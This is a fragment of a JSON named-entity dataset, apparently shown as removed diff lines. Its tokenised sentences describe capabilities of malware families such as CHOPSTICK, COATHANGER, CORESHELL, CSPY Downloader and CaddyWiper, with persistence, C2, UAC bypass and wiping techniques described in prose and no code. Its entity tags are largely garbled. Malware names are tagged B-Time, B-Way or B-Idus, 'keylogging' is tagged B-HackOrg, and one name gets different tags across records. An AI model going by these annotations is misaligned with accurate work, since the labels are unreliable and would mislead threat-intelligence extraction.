] - }, - { - "tokens": [ - "Bundlore", - "will", - "enumerate", - "the", - "macOS", - "version", - "to", - "determine", - "which", - "follow-on", - "behaviors", - "to", - "execute", - "using", - "<code>/usr/bin/sw_vers", - "-productVersion</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "leveraged", - "/bin/sh", - "and", - "/bin/bash", - "to", - "execute", - "commands", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "uses", - "HTTP", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "CALENDAR", - "malware", - "communicates", - "through", - "the", - "use", - "of", - "events", - "in", - "Google", - "Calendar." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CALENDAR", - "has", - "a", - "command", - "to", - "run", - "cmd.exe", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBALL", - "has", - "the", - "ability", - "to", - "use", - "FTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBALL", - "has", - "the", - "ability", - "to", - "download", - "and", - "install", - "a", - "remote", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBALL", - "has", - "been", - "executed", - "through", - "users", - "being", - "lured", - "into", - "opening", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "CARROTBALL", - "has", - "used", - "a", - "custom", - "base64", - "alphabet", - "to", - "decode", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBAT", - "has", - "the", - "ability", - "to", - "execute", - "obfuscated", - "commands", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBAT", - "has", - "the", - "ability", - "to", - "download", - "a", - "base64", - "encoded", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBAT", - "has", - "the", - "ability", - "to", - "delete", - "downloaded", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBAT", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "a", - "remote", - "file", - "via", - "certutil." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBAT", - "has", - "the", - "ability", - "to", - "determine", - "the", - "operating", - "system", - "of", - "the", - "compromised", - "host", - "and", - "whether", - "Windows", - "is", - "being", - "run", - "with", - "x86", - "or", - "x64", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CARROTBAT", - "has", - "the", - "ability", - "to", - "execute", - "command", - "line", - "arguments", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CCBkdr", - "was", - "added", - "to", - "a", - "legitimate,", - "signed", - "version", - "5.33", - "of", - "the", - "CCleaner", - "software", - "and", - "distributed", - "on", - "CCleaner's", - "distribution", - "site." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CCBkdr", - "can", - "use", - "a", - "DGA", - "for", - "Fallback", - "Channels", - "if", - "communications", - "with", - "the", - "primary", - "command", - "and", - "control", - "server", - "are", - "lost." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "encrypts", - "C2", - "communications", - "with", - "TLS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "is", - "capable", - "of", - "performing", - "remote", - "command", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Part", - "of", - "APT28's", - "operation", - "involved", - "using", - "CHOPSTICK", - "modules", - "to", - "copy", - "itself", - "to", - "air-gapped", - "machines,", - "using", - "files", - "written", - "to", - "USB", - "sticks", - "to", - "transfer", - "data", - "and", - "command", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "can", - "use", - "a", - "DGA", - "for", - "Fallback", - "Channels,", - "domains", - "are", - "generated", - "by", - "concatenating", - "words", - "from", - "lists." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "can", - "switch", - "to", - "a", - "new", - "C2", - "channel", - "if", - "the", - "current", - "one", - "is", - "broken." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "older", - "version", - "of", - "CHOPSTICK", - "has", - "a", - "module", - "that", - "monitors", - "all", - "mounted", - "volumes", - "for", - "files", - "with", - "the", - "extensions", - ".doc,", - ".docx,", - ".pgp,", - ".gpg,", - ".m2f,", - "or", - ".m2o." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "may", - "store", - "RC4", - "encrypted", - "configuration", - "information", - "in", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "is", - "capable", - "of", - "performing", - "remote", - "file", - "transmission." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "used", - "a", - "proxy", - "server", - "between", - "victims", - "and", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "is", - "capable", - "of", - "performing", - "keylogging." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Various", - "implementations", - "of", - "CHOPSTICK", - "communicate", - "with", - "C2", - "over", - "SMTP", - "and", - "POP3." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "may", - "modify", - "Registry", - "keys", - "to", - "store", - "RC4", - "encrypted", - "configuration", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "provides", - "access", - "to", - "the", - "Windows", - "Registry,", - "which", - "can", - "be", - "used", - "to", - "gather", - "information." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Part", - "of", - "APT28's", - "operation", - "involved", - "using", - "CHOPSTICK", - "modules", - "to", - "copy", - "itself", - "to", - "air-gapped", - "machines", - "and", - "using", - "files", - "written", - "to", - "USB", - "sticks", - "to", - "transfer", - "data", - "and", - "command", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "has", - "the", - "capability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "checks", - "for", - "antivirus", - "and", - "forensics", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "encrypts", - "C2", - "communications", - "with", - "RC4." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CHOPSTICK", - "includes", - "runtime", - "checks", - "to", - "identify", - "an", - "analysis", - "environment", - "and", - "prevent", - "execution", - "on", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Various", - "implementations", - "of", - "CHOPSTICK", - "communicate", - "with", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "COATHANGER", - "connects", - "to", - "command", - "and", - "control", - "infrastructure", - "using", - "SSL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "COATHANGER", - "decodes", - "configuration", - "items", - "from", - "a", - "bundled", - "file", - "for", - "command", - "and", - "control", - "activity." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "copies", - "the", - "malicious", - "file", - "<code>/data2/.bd.key/preload.so</code>", - "to", - "<code>/lib/preload.so</code>,", - "then", - "launches", - "a", - "child", - "process", - "that", - "executes", - "the", - "malicious", - "file", - "<code>/data2/.bd.key/authd</code>", - "as", - "<code>/bin/authd</code>", - "with", - "the", - "arguments", - "<code>/lib/preload.so", - "reboot", - "newreboot", - "1</code>.", - "This", - "injects", - "the", - "malicious", - "preload.so", - "file", - "into", - "the", - "process", - "with", - "PID", - "1,", - "and", - "replaces", - "its", - "reboot", - "function", - "with", - "the", - "malicious", - "newreboot", - "function", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "is", - "installed", - "following", - "exploitation", - "of", - "a", - "vulnerable", - "FortiGate", - "device." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "removes", - "files", - "from", - "victim", - "environments", - "following", - "use", - "in", - "multiple", - "instances." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "will", - "survey", - "the", - "contents", - "of", - "system", - "files", - "during", - "installation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "creates", - "and", - "installs", - "itself", - "to", - "a", - "hidden", - "installation", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "will", - "remove", - "and", - "write", - "malicious", - "shared", - "objects", - "associated", - "with", - "legitimate", - "system", - "functions", - "such", - "as", - "`read(2)`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "will", - "create", - "a", - "daemon", - "for", - "timed", - "check-ins", - "with", - "command", - "and", - "control", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "will", - "set", - "the", - "GID", - "of", - "`httpsd`", - "to", - "90", - "when", - "infected." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "uses", - "ICMP", - "for", - "transmitting", - "configuration", - "information", - "to", - "and", - "from", - "its", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "can", - "store", - "obfuscated", - "configuration", - "information", - "in", - "the", - "last", - "56", - "bytes", - "of", - "the", - "file", - "`/date/.bd.key/preload.so`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "COATHANGER", - "will", - "query", - "running", - "process", - "information", - "to", - "determine", - "subsequent", - "program", - "execution", - "flow." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "includes", - "a", - "binary", - "labeled", - "`authd`", - "that", - "can", - "inject", - "a", - "library", - "into", - "a", - "running", - "process", - "and", - "then", - "hook", - "an", - "existing", - "function", - "within", - "that", - "process", - "with", - "a", - "new", - "function", - "from", - "that", - "library." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "hooks", - "or", - "replaces", - "multiple", - "legitimate", - "processes", - "and", - "other", - "functions", - "on", - "victim", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "first", - "stage", - "of", - "COATHANGER", - "is", - "delivered", - "as", - "a", - "packed", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "provides", - "a", - "BusyBox", - "reverse", - "shell", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "COATHANGER", - "uses", - "an", - "HTTP", - "GET", - "request", - "to", - "initialize", - "a", - "follow-on", - "TLS", - "tunnel", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORALDECK", - "has", - "created", - "password-protected", - "RAR,", - "WinImage,", - "and", - "zip", - "archives", - "to", - "be", - "exfiltrated." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORALDECK", - "has", - "exfiltrated", - "data", - "in", - "HTTP", - "POST", - "headers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORALDECK", - "searches", - "for", - "specified", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "contains", - "unused", - "machine", - "instructions", - "in", - "a", - "likely", - "attempt", - "to", - "hinder", - "analysis." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "downloads", - "another", - "dropper", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "can", - "communicate", - "over", - "SMTP", - "and", - "POP3", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "obfuscates", - "strings", - "using", - "a", - "custom", - "stream", - "cipher." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "has", - "established", - "persistence", - "by", - "creating", - "autostart", - "extensibility", - "point", - "(ASEP)", - "Registry", - "entries", - "in", - "the", - "Run", - "key", - "and", - "other", - "Registry", - "keys,", - "as", - "well", - "as", - "by", - "creating", - "shortcuts", - "in", - "the", - "Internet", - "Explorer", - "Quick", - "Start", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "is", - "installed", - "via", - "execution", - "of", - "rundll32", - "with", - "an", - "export", - "named", - "\"init\"", - "or", - "\"InitW.\"" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "CORESHELL", - "C2", - "messages", - "are", - "Base64-encoded." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "C2", - "messages", - "are", - "encrypted", - "with", - "custom", - "stream", - "ciphers", - "using", - "six-byte", - "or", - "eight-byte", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "CORESHELL", - "collects", - "hostname,", - "volume", - "serial", - "number", - "and", - "OS", - "version", - "data", - "from", - "the", - "victim", - "and", - "sends", - "the", - "information", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CORESHELL", - "can", - "communicate", - "over", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "can", - "bypass", - "UAC", - "using", - "the", - "SilentCleanup", - "task", - "to", - "execute", - "the", - "binary", - "with", - "elevated", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "has", - "come", - "signed", - "with", - "revoked", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "has", - "the", - "ability", - "to", - "self", - "delete." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "has", - "the", - "ability", - "to", - "remove", - "values", - "it", - "writes", - "to", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "can", - "download", - "additional", - "tools", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "has", - "been", - "delivered", - "via", - "malicious", - "documents", - "with", - "embedded", - "macros." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "has", - "attempted", - "to", - "appear", - "as", - "a", - "legitimate", - "Windows", - "service", - "with", - "a", - "fake", - "description", - "claiming", - "it", - "is", - "used", - "to", - "support", - "packed", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "can", - "write", - "to", - "the", - "Registry", - "under", - "the", - "<code>%windir%</code>", - "variable", - "to", - "execute", - "tasks." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "can", - "use", - "the", - "schtasks", - "utility", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "has", - "been", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "can", - "search", - "loaded", - "modules,", - "PEB", - "structure,", - "file", - "paths,", - "Registry", - "keys,", - "and", - "memory", - "to", - "determine", - "if", - "it", - "is", - "being", - "debugged", - "or", - "running", - "in", - "a", - "virtual", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CSPY", - "Downloader", - "can", - "use", - "GET", - "requests", - "to", - "download", - "additional", - "payloads", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Features", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Cachedump", - "can", - "extract", - "cached", - "password", - "hashes", - "from", - "cache", - "entry", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CaddyWiper", - "can", - "work", - "alphabetically", - "through", - "drives", - "on", - "a", - "compromised", - "system", - "to", - "take", - "ownership", - "of", - "and", - "overwrite", - "all", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "CaddyWiper", - "has", - "the", - "ability", - "to", - "destroy", - "information", - "about", - "a", - "physical", - "drive's", - "partitions", - "including", - "the", - "MBR,", - "GPT,", - "and", - "partition", - "entries." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CaddyWiper", - "can", - "enumerate", - "all", - "files", - "and", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CaddyWiper", - "has", - "the", - "ability", - "to", - "dynamically", - "resolve", - "and", - "use", - "APIs,", - "including", - "`SeTakeOwnershipPrivilege`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CaddyWiper", - "can", - "obtain", - "a", - "list", - "of", - "current", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CaddyWiper", - "can", - "use", - "`DsRoleGetPrimaryDomainInformation`", - "to", - "determine", - "the", - "role", - "of", - "the", - "infected", - "machine.", - "CaddyWiper", - "can", - "also", - "halt", - "execution", - "if", - "the", - "compromised", - "host", - "is", - "identified", - "as", - "a", - "domain", - "controller." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CaddyWiper", - "can", - "modify", - "ACL", - "entries", - "to", - "take", - "ownership", - "of", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "identify", - "open", - "windows", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "compress", - "stolen", - "data", - "into", - "a", - ".cab", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "record", - "audio", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "steal", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "log", - "keystrokes", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - 